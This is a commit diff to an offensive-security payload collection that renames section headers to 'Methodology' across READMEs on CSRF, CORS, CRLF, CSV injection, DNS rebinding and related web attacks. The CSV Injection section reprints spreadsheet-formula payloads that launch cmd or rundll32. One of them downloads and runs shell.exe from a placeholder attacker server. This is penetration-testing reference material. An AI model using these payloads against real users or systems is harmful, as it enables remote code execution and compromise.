Normalize page header for CSRF, DNS, DOS, Dependencies

Author: swisskyrepo

Business Logic Errors/README.md

@@ -5,7 +5,7 @@
 
 ## Summary
 
-* [Examples](#examples)
+* [Methodology](#methodology)
     * [Review Feature Testing](#review-feature-testing)
     * [Discount Code Feature Testing](#discount-code-feature-testing)
     * [Delivery Fee Manipulation](#delivery-fee-manipulation)
@@ -17,7 +17,7 @@
 * [References](#references)
 
 
-## Examples
+## Methodology
 
 Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
 

CORS Misconfiguration/README.md

@@ -7,7 +7,7 @@
 
 * [Tools](#tools)
 * [Requirements](#requirements)
-* [Exploitation](#exploitation)
+* [Methodology](#methodology)
     * [Origin Reflection](#origin-reflection)
     * [Null Origin](#null-origin)
     * [XSS on Trusted Origin](#xss-on-trusted-origin)
@@ -33,7 +33,7 @@
 * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
 
 
-## Exploitation
+## Methodology
 
 Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
 

CRLF Injection/README.md

@@ -7,15 +7,18 @@
 
 ## Summary
 
-- [Add a cookie](#add-a-cookie)
-- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
-- [Write HTML](#write-html)
-- [Filter Bypass](#filter-bypass)
-- [Labs](#labs)
-- [References](#references)
+* [Methodology](#methodology)
+    * [Add a cookie](#add-a-cookie)
+    * [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
+    * [Write HTML](#write-html)
+* [Filter Bypass](#filter-bypass)
+* [Labs](#labs)
+* [References](#references)
 
 
-## Add a cookie
+## Methodology
+
+### Add a cookie
 
 Requested page
 
@@ -39,7 +42,7 @@ x-xss-protection: 1; mode=block
 ```
 
 
-## Add a cookie - XSS Bypass
+### Add a cookie - XSS Bypass
 
 Requested page
 
@@ -71,7 +74,7 @@ X-XSS-Protection:0
 ```
 
 
-## Write HTML
+### Write HTML
 
 Requested page
 

CSV Injection/README.md

@@ -1,53 +1,49 @@
 # CSV Injection
 
-Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
+> Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
 
-## Exploit
 
-Basic exploits with **Dynamic Data Exchange**.
-
-
-Payload: pop a calc
-
-```powershell
-DDE ("cmd";"/C calc";"!A0")A0
-@SUM(1+1)*cmd|' /C calc'!A0
-=2+5+cmd|' /C calc'!A0
-```
-
-Payload: pop a notepad
-
-```powershell
-=cmd|' /C notepad'!'A1'
-```
-
-Payload: powershell download and execute
+## Summary
 
-```powershell
-=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
-```
-
-Payload: Prefix obfuscation and command chaining
+* [Methodology](#methodology)
+* [References](#references)
 
-```powershell
-=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
-=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
-+thespanishinquisition(cmd|'/c calc.exe'!A
-=         cmd|'/c calc.exe'!A
-```
 
-Payload: Using rundll32 instead of cmd
+## Methodology
 
-```powershell
-=rundll32|'URL.dll,OpenURL calc.exe'!A
-=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
-```
-
-Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
+Basic exploits with **Dynamic Data Exchange**.
 
-```powershell
-=    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A
-```
+* Spawn a calc
+    ```powershell
+    DDE ("cmd";"/C calc";"!A0")A0
+    @SUM(1+1)*cmd|' /C calc'!A0
+    =2+5+cmd|' /C calc'!A0
+    =cmd|' /C calc'!'A1'
+    ```
+
+* PowerShell download and execute
+    ```powershell
+    =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
+    ```
+
+* Prefix obfuscation and command chaining
+    ```powershell
+    =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
+    =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
+    +thespanishinquisition(cmd|'/c calc.exe'!A
+    =         cmd|'/c calc.exe'!A
+    ```
+
+* Using rundll32 instead of cmd
+    ```powershell
+    =rundll32|'URL.dll,OpenURL calc.exe'!A
+    =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A
+    ```
+
+* Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed.
+    ```powershell
+    =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A
+    ```
 
 Technical details of the above payloads:
 

CVE Exploits/README.md

@@ -1,6 +1,6 @@
 # Common Vulnerabilities and Exposures
 
-A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
+> A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
 
 ## Summary
 

Clickjacking/README.md

@@ -24,9 +24,10 @@
 
 ## Tools
 
-* [Burp Suite](https://portswigger.net/burp)
-* [OWASP ZAP](https://github.com/zaproxy/zaproxy)
-* [Clickjack](https://github.com/machine1337/clickjack)
+* [portswigger/burp](https://portswigger.net/burp)
+* [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy)
+* [machine1337/clickjack](https://github.com/machine1337/clickjack)
+
 
 ## Methodology
 

Client Side Path Traversal/README.md

@@ -10,8 +10,9 @@
 ## Summary
 
 * [Tools](#tools)
-* [CSPT to XSS](#cspt-to-xss)
-* [CSPT to CSRF](#cspt-to-xss)
+* [Methodology](#methodology)
+    * [CSPT to XSS](#cspt-to-xss)
+    * [CSPT to CSRF](#cspt-to-xss)
 * [Labs](#labs)
 * [References](#references)
 
@@ -21,7 +22,9 @@
 * [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal.
 
 
-## CSPT to XSS
+## Methodology
+
+### CSPT to XSS
 
 ![](https://matanber.com/images/blog/cspt-query-param.png)
 
@@ -35,7 +38,7 @@ A post-serving page calls the fetch function, sending a request to a URL with at
 * Final payload is `https://example.com/static/cms/news.html?newsitemid=../pricing/default.js?cb=alert(document.domain)//`
 
 
-## CSPT to CSRF
+### CSPT to CSRF
 
 A CSPT is redirecting legitimate HTTP requests, allowing the front end to add necessary tokens for API calls, such as authentication or CSRF tokens. This capability can potentially be exploited to circumvent existing CSRF protection measures.
 

Command Injection/README.md

@@ -6,7 +6,7 @@
 ## Summary
 
 * [Tools](#tools)
-* [Exploits](#exploits)
+* [Methodology](#methodology)
     * [Basic commands](#basic-commands)
     * [Chaining commands](#chaining-commands)
     * [Argument injection](#argument-injection)
@@ -46,7 +46,7 @@
 * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
 
 
-## Exploits
+## Methodology
 
 Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
 

Cross-Site Request Forgery/README.md

@@ -9,7 +9,7 @@
 * [Methodology](#methodology)
 * [Payloads](#payloads)
     * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
-    * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
+    * [HTML GET - No User Interaction](#html-get---no-user-interaction)
     * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
     * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
     * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction)
@@ -22,7 +22,7 @@
 
 ## Tools
 
-* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
+* [0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe) - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.
 
 
 ## Methodology

DNS Rebinding/README.md

@@ -5,7 +5,7 @@
 ## Summary
 
 * [Tools](#tools)
-* [Exploitation](#exploitation)
+* [Methodology](#methodology)
 * [Protection Bypasses](#protection-bypasses)
     * [0.0.0.0](#0000)
     * [CNAME](#CNAME)
@@ -15,11 +15,11 @@
 
 ## Tools
 
-- [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks.
-- [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack)
+- [nccgroup/singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework. 
+- [rebind.it](http://rebind.it/) - Singularity of Origin Web Client.
 
 
-## Exploitation
+## Methodology
 
 First, we need to make sure that the targeted service is vulnerable to DNS rebinding.
 It can be done with a simple curl request:
@@ -75,6 +75,7 @@ $ dig www.example.com +noall +answer
 localhost.example.com.            381     IN      CNAME   localhost.
 ```
 
+
 ## References
 
 - [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)